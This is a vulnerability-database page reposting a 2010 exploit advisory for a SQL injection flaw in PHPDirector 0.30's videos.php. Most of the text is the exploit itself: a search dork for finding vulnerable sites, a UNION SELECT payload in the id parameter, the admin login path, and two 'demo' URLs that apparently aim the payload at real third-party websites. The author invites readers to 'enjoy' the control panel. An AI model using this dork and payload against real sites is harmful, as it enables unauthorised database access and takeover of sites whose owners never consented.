PHPDirector 0.30 remote SQL injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050534 漏洞类型
发布时间 2010-06-30 更新时间 2010-06-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010060127
|漏洞详情
漏洞细节尚未披露
|漏洞EXP

======================================================================
PHPDirector 0.30  (videos.php) SQL Injection Vulnerability           #
======================================================================
# Date               : 29/06/2010                                    #
# Author             : Mr-AbdoX                                      #
# Emails             : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com             #
# My web Sites       : http://Sec-Eviles.com/vb & http://Arspam.com/ #
# Script home        : www.phpdirector.co.uk/                        #
# Tested on          : Linux & Windows                               #
=================Exploit==============================================

Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ]

[~] ExploiT [~]

http://www.site.com/videos.php?id=[SQL]

union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--


[~]  ConTroL Panel (admin login) [~]

http://www.site.com/login.php


[~] demo [~]



http://www.onevent.biz/paramore/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

http://www.videoindirizle.com/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

enjoy in control panel Like U WanT  :p



Don't  Forget greetz Me...

Peace


[~] GreetZ To [~]

The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz